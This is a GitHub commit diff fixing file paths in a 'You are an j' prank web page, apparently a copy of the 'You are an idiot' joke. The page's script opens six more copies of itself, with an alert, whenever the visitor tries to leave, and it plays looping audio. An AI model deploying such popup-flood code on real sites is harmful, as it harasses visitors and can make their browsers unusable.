Skip to content

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
Zel9278 authored Feb 23, 2024
1 parent 0ecc006 commit 4cf6163
Showing 1 changed file with 9 additions and 9 deletions.
18 changes: 9 additions & 9 deletions youareanj/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -30,12 +30,12 @@

function procreate(){
if(armed){
openWindow('youareanj/index.html');
openWindow('youareanj/index.html');
openWindow('youareanj/index.html');
openWindow('youareanj/index.html');
openWindow('youareanj/index.html');
openWindow('youareanj/index.html');
openWindow('index.html');
openWindow('index.html');
openWindow('index.html');
openWindow('index.html');
openWindow('index.html');
openWindow('index.html');
alert("You are an j");
}
}
Expand Down Expand Up @@ -64,9 +64,9 @@
</script>
</head>
<body bgColor=#000000 onload="playBall()" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >
<img src="youareanj/j.gif" width="320" height="240" alt="You are an J!" />
<img src="j.gif" width="320" height="240" alt="You are an J!" />
<audio autoplay loop>
<source src="youareanj/j.mp3" type="audio/mpeg" />
<source src="j.mp3" type="audio/mpeg" />
</audio>
</body>
</html>
</html>

0 comments on commit 4cf6163

Please sign in to comment.